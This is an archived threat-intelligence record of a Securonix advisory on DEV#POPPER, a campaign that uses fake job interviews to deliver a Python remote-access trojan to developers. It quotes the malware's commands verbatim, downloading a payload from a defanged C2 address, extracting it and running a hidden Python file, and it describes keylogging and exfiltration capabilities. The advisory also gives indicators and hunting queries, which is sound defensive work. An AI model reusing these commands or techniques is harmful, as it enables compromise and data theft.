{
	"id": "f4714550-f7c9-4635-aac7-6865f2a57fcc",
	"created_at": "2026-04-06T00:10:55.214701Z",
	"updated_at": "2026-04-10T03:28:28.680487Z",
	"deleted_at": null,
	"sha1_hash": "cd9fa509df0435268d6fed4c34cd4409bafd46fa",
	"title": "Analysis of DEV#POPPER: New Attack Campaign Targeting Software Developers Likely Associated With North Korean Threat Actors",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 424006,
	"plain_text": "Analysis of DEV#POPPER: New Attack Campaign Targeting\r\nSoftware Developers Likely Associated With North Korean Threat\r\nActors\r\nArchived: 2026-04-02 10:54:23 UTC\r\nSecuronix Threat Research Security Advisory – Fast Track/Early-Warning Coverage Advisory\r\n(FCA)\r\nBy Securonix Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nApr 24, 2024\r\ntldr:\r\nThe Securonix Threat Research Team has been monitoring a new ongoing social engineering attack campaign\r\n(tracked by STR as DEV#POPPER) likely associated with North Korean threat actors who are targeting developers\r\nusing fake interviews to deliver a Python-based RAT.\r\nhttps://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/\r\nPage 1 of 12\n\nThe Threat Research team has been investigating a new threat campaign (tracked by STR as DEV#POPPER) that’s\r\nbeen targeting software developers. STR has been able to identify malicious software repositories used by attackers\r\nas part of the attack campaign, which we’ll delve deeper into to get a better understanding of how the malicious\r\nthreat actors infect systems and what their capabilities are.\r\nIntroduction\r\nSocial engineering is an advanced tactic used by threat actors to manipulate individuals into divulging confidential\r\ninformation or performing actions that they might normally not. The attacker’s goal is to trick the user into\r\nunknowingly compromising themselves or their place of employment. Unlike traditional hacking methods which rely on\r\nexploitation, social engineering targets human vulnerabilities through psychological manipulation. 
This\r\nmethod plays on basic human traits such as trust, fear or the desire to simply be helpful.\r\nIn the case of the DEV#POPPER attack campaign we’ve been observing, an interesting form of social engineering\r\nwas noted which involves the targeting of specific professional groups such as software developers. This technique,\r\nwhile not extremely prevalent at the moment, is still ongoing and has been reported a number of times in the past\r\nas a tactic of North Korean threat actors.\r\nIn summary, one example of this is where attackers set up fake job interviews for developers, pretending to be\r\nlegitimate job interviewers. During these fraudulent interviews, the developers are often asked to perform tasks that\r\ninvolve downloading and running software from sources that appear legitimate, such as GitHub. The software\r\ncontained a malicious Node.js payload that, once executed, compromised the developer’s system.\r\nThis method is effective because it exploits the developer’s professional engagement and trust in the job application\r\nprocess, where refusal to perform the interviewer’s requests could compromise the job opportunity. The attackers\r\ntailor their approach to appear as credible as possible, often by mimicking real companies and replicating actual\r\ninterview processes. 
This guise of professionalism and legitimacy lulls the target into a false sense of security,\r\nmaking it easier to deploy malware without arousing suspicion.\r\nNote – At the time of publication, the attackers’ GitHub repositories we analyze below have already been deleted.\r\nHowever, members of the cybersecurity community have picked up on other GitHub-hosted samples as well.\r\nStage 1: Malicious Node.js Project\r\nThe first stage involves downloading or cloning a git project from GitHub which would have been sent to the\r\ninterviewee by the interviewer. The zip archive contains a legitimate-looking Node.js project containing a\r\nREADME.md.\r\nBuried in the Backend directory was a single JavaScript file which on the surface appears to be part of a legitimate Node.js\r\nproject using Mongoose, which is a Node.js package that provides MongoDB object modeling in an asynchronous\r\nenvironment.\r\nFigure 1: imageDetails.js – unusually long scroll bar\r\nHowever, closer examination reveals a huge line of highly obfuscated code when scrolling far to the right.\r\nAn example of how large this is can be seen by looking at the scrollbar in the figure above. The gif in the figure\r\nbelow also demonstrates this, as the obfuscated code can be seen past a large comment block on the right.\r\nFigure 2: Video highlighting the malicious JavaScript code out of view\r\nRemoving the JavaScript code from imageDetails.js and placing it into its own file allows us to analyze it more\r\neasily. 
The code is obfuscated using several layers of obfuscation including base64 and variable substitutions.\r\nFigure 3: Extracted obfuscated JavaScript code from imageDetails.js.\r\nStage 2: Command execution and payload download\r\nWhen the victim eventually runs the Node.js project, the malicious JavaScript code in Stage 1 is executed through the\r\nNode.js process (node.exe). The purpose of the malicious script in Stage 1 is simply to download an\r\narchive file, extract it and then execute the next stage.\r\nThrough the node.exe process we observed the following commands:\r\nCommand / Purpose\r\nCommand: cmd.exe /d /s /c “curl -lo “C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\p.zi” “hxxp://147.124.214[.]131:1244/pdown”\r\nPurpose: Download next stage payload “p.zi”\r\nCommand: tar -xf C:\\Users\\[REDACTED]\\AppData\\Local\\Temp\\p2.zip -c c:\\users\\[REDACTED]”\r\nPurpose: Using the tar command, extract the zip file into the user’s temp directory\r\nCommand: cmd.exe /d /s /c “”c:\\users\\[REDACTED]\\.pyp\\python.exe” “c:\\users\\[REDACTED]\\.npl”\r\nPurpose: Run python.exe and execute the hidden file which was just extracted, “.npl”\r\nStage 3: Python code execution – .npl\r\nThe “.npl” file is technically a Python file without an extension; it uses a leading dot “.” to indicate to the\r\noperating system that it is a hidden file. This may or may not be hidden from view to the user depending on their\r\noperating system settings.\r\nThe file contains a large base64 payload and uses a combination of string manipulation and decoding to execute the\r\nPython code hidden inside of it. 
Base64 encoding and XOR logic are used for the content behind the hidden string.\r\nThis is then executed as Python code using exec().\r\nFigure 4: Python execution .npl file contents\r\nThe decoded result contains several key variables such as its current path and a hard-coded C2 server:\r\nhxxp://147.124.214[.]131:1244. The Python script then calls and executes another Python script which is located at\r\nC:\\Users\\Redacted\\.n2/pay.\r\nStage 3: Python code execution – pay\r\nThe “pay” script is also an extensionless file, similar to the first Python script we analyzed. This next script contains\r\nsimilar payload execution tactics where a Base64 string is decoded in the same fashion; however, two distinct strings\r\nare executed. Each of these can be seen in the figure below.\r\nFigure 5: res – Python file contents\r\nThe first decoded code string executes and gathers system and network information from the infected computer and\r\nthen sends this data to a remote server. The data includes the following:\r\nOperating system type\r\nHostname\r\nOS release version\r\nOS version\r\nUsername of the logged-in user\r\nA unique identifier for the device (uuid) generated by hashing the MAC address and username\r\nThis information is gathered and then transmitted in a JSON-like format back to the attacker’s C2 server by issuing\r\na carefully crafted HTTP POST request.\r\nThe second decoded and executed string is much longer than the first and contains quite a bit more 
functionality.\r\nOnce executed, the script functions similarly to a RAT (Remote Access Trojan), allowing the attacker to interact\r\nwith the victim’s machine remotely. After analyzing the decoded portion of the script, we observed the following\r\ncapabilities:\r\nNetworking and session creation: Establishes persistent TCP\r\nconnections, including structuring and sending JSON-formatted data.\r\nFile system interaction: Contains functions to traverse directories and filter files based on specific\r\nextensions and directories to exclude. It can also locate and potentially exfiltrate files that do not match\r\ncertain criteria (like file size and extension).\r\nRemote command execution: The script contains several functions which allow for the execution of\r\nsystem shell commands and scripts. This includes browsing the filesystem and executing shell commands.\r\nData handling and transmission: Functionality for encoding data over an established TCP connection. It\r\nhandles data reception, decoding different character encodings, and manages transmission errors and\r\ntimeouts.\r\nExfiltration and uploading: For exfiltration, the Python script is able to send files to a remote FTP server\r\nwith the ability to filter files in or out based on their extension. Other functions exist to help automate this\r\nprocess by collecting data from various user directories like Documents and Downloads.\r\nClipboard and keystroke logging: The script includes capabilities to monitor and exfiltrate clipboard\r\ncontents and keystrokes.\r\nSecuronix recommendations\r\nWhen it comes to attacks which originate through social engineering, it’s critical to maintain a security-focused\r\nmindset, especially during intense and stressful situations like job interviews. The attackers behind the\r\nDEV#POPPER campaigns abuse this, knowing that the person on the other end is highly distracted and in a\r\nmuch more vulnerable state. 
When it comes to prevention and detection, the Securonix Threat Research team\r\nrecommends:\r\nRaise awareness of the fact that people are targets of social engineering attacks just as technology is a target of\r\nexploitation. Remaining extra vigilant and security conscious, even during high-stress situations, is critical\r\nto preventing the issue altogether.\r\nIn case of code execution, monitor common malware staging directories, especially script-related activity in\r\nworld-writable directories. In the case of this campaign the threat actors staged in subdirectories found in\r\nthe user’s %APPDATA% directory.\r\nMonitor for the usage of non-default scripting languages such as Python on endpoints and servers which\r\nshould normally not execute it. To assist in this, leverage additional process-level logging such as Sysmon\r\nand PowerShell logging for additional log detection coverage.\r\nSecuronix customers can scan endpoints using the Securonix hunting queries below.\r\nMITRE ATT\u0026CK Matrix\r\nTactics / Techniques\r\nCollection\r\nT1560: Archive Collected Data\r\nCommand and Control\r\nT1132: Data Encoding\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1070.004: Indicator Removal: File Deletion\r\nDiscovery\r\nT1033: System Owner/User Discovery\r\nT1082: System Information Discovery\r\nExecution\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.003: Command and Scripting Interpreter: Windows Command Shell\r\nT1059.006: Command and Scripting Interpreter: Python\r\nExfiltration\r\nT1041: Exfiltration Over C2 Channel\r\nRelevant provisional Securonix detections\r\nEDR-ALL-930-RU\r\nEDR-ALL-1246-RU\r\nNGF-ALL-833-ER\r\nRelevant hunting queries\r\n(remove square brackets “[ ]” for IP addresses or URLs)\r\nindex = activity AND rg_functionality = 
“Web Proxy” AND (destinationaddress = “147.124.214[.]131” OR\r\ndestinationaddress = “173.211.106[.]101”)\r\nindex = activity AND rg_functionality = “Next Generation Firewall” AND (destinationaddress =\r\n“147.124.214[.]131” OR destinationaddress = “173.211.106[.]101”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Network\r\nconnection detected” OR deviceaction = “Network connection detected (rule: NetworkConnect)”) AND\r\ndestinationport=”1244″)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process\r\nCreate” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR\r\ndeviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”)\r\nAND destinationprocessname ENDS WITH “python.exe” AND (destinationprocessname ENDS WITH\r\n“cmd.exe” OR destinationprocessname ENDS WITH “powershell.exe”)\r\n(change the first destinationprocessname to sourceprocessname)\r\nC2 and infrastructure\r\nC2 Address\r\n147.124.214[.]131\r\n173.211.106[.]101\r\nAnalyzed files/hashes\r\nFile Name SHA256\r\nsports_platform_app-main.zip 45c991529a421104f2edf03d92e01d95774bf54325f9107dd4139505912a0c1e\r\nimageDetails.js 33617F0AC01A0F7FA5F64BD8EDEF737F678C44E677E4A2FB23C6B8A3BCD39FA2\r\n.npl F9CA12321FB91157CCE8513E935810D1C2005AB0739322B474F0CB4AF2605D16\r\npay 977A9024962102B02128D391C0543C63328D3F26701ECA1A5D282AF4D493DC2E\r\nReferences:\r\n1. 
Hacking Employers and Seeking Employment: Two Job-Related Campaigns Bear Hallmarks of North\r\nKorean Threat Actors\r\nhttps://unit42.paloaltonetworks.com/two-campaigns-by-north-korea-bad-actors-target-job-hunters/\r\nSource: https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://www.securonix.com/blog/analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors/"
	],
	"report_names": [
		"analysis-of-devpopper-new-attack-campaign-targeting-software-developers-likely-associated-with-north-korean-threat-actors"
	],
	"threat_actors": [
		{
			"id": "4fc99d9b-9b66-4516-b0db-520fbef049ed",
			"created_at": "2025-10-29T02:00:51.949631Z",
			"updated_at": "2026-04-10T02:00:05.346203Z",
			"deleted_at": null,
			"main_name": "Contagious Interview",
			"aliases": [
				"Contagious Interview",
				"DeceptiveDevelopment",
				"Gwisin Gang",
				"Tenacious Pungsan",
				"DEV#POPPER",
				"PurpleBravo",
				"TAG-121"
			],
			"source_name": "MITRE:Contagious Interview",
			"tools": [
				"InvisibleFerret",
				"BeaverTail",
				"XORIndex Loader",
				"HexEval Loader"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434255,
	"ts_updated_at": 1775791708,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.pdf",
		"text": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.txt",
		"img": "https://archive.orkl.eu/cd9fa509df0435268d6fed4c34cd4409bafd46fa.jpg"
	}
}